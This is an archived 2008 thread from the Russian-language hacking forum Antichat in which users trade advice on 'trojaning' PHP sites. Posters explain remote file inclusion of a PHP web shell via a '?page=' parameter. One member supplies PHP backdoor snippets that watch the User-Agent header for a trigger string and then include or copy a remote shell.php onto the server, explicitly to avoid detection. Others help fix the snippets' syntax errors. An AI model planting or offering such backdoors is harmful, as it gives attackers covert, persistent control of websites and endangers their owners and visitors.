ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.03.2008, 11:55
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
Сообщение от Scipio
Так тебе надо скрипт протроянить? вот:
то что ты мне дал как вызывается? 
|
|
|
30.03.2008, 12:14
|
|
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160
Репутация:
457
|
|
Сообщение от QZAR-X
то что ты мне дал как вызывается? читай внимательнее, это он не тебе писал.
В твоем случае нужно залить на любой другой хост пхп шелл, а потом уже его подключаешь - ?page=http://site.r/shell.php
|
|
|
|
30.03.2008, 10:50
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770
Репутация:
-5
|
|
Может поможет мне ктонить? А? Мой пост несколько страниц назад...
|
|
|
|
30.03.2008, 10:58
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
Сообщение от azote
Может поможет мне ктонить? А? Мой пост несколько страниц назад...
сразу сказать на какой странице твой пост нельзя у лююдей траф не резиновый непроше юзать шел который скачивае или отправляет шел по почте ?
Последний раз редактировалось heks; 30.03.2008 в 11:02..
|
|
|
|
30.03.2008, 11:32
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
ne короче такая тема нашел на сайте инклуд. инклудит страницу с другого сайта например страница php открывается как php а когда инклудишь txt открывается как txt что нить можно сделать с такой иньекцией
|
|
|
|
30.03.2008, 12:00
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
есть у тебя допустим скрипт:
PHP код:
<?php
....
$k=$_SERVER["USER_AGENT"];
....
if (strpos($k,"f35761"){ $path=explode("^",$k); include($path[1]);}
....
?>
ты меняешь у себя юзер агент (имя браузера) на например f35761^http://site/shell.php
и вызываешь этот скрипт, он проинклюдит http://site/shell.php
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 12:02
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
у меня ошибку во 2-ой строке вываливает
Parse error: syntax error, unexpected '{'
|
|
|
|
30.03.2008, 12:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
после if (strpos($k,"f35761") скобку ) поставь, я почемуто пропустил
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 12:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
писал я это для QZAR-X, тут если тебе инклюд не нужен, можешь функцию copy использовать, но опять же копирование будет с удаленного серва (имхо инклюд в этом случае надежнее, хотя хз)
Код:
<?php
....
$k=$_SERVER["USER_AGENT"];
....
if (strpos($k,"f35761")){ $path=explode("^",$k); copy(path[1],path[2]);}
....
?>
здесь в юзер агент пишешь: f35761^http://site/shell.php^/path/na/serve/shell.php
спросиш нахрена нужны заморочки с юзер агентом, скажу, для меньшего палева, вобще вариантов куча, мог бы и сам че нить придумать
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 13:38
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Scipio
if (strpos($k,"f35761")) - если f35761 стоит в начале строки, то надо либо if (strpos($k,"f35761") !== FALSE), либо if (strpos(' '.$k,"f35761"))
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид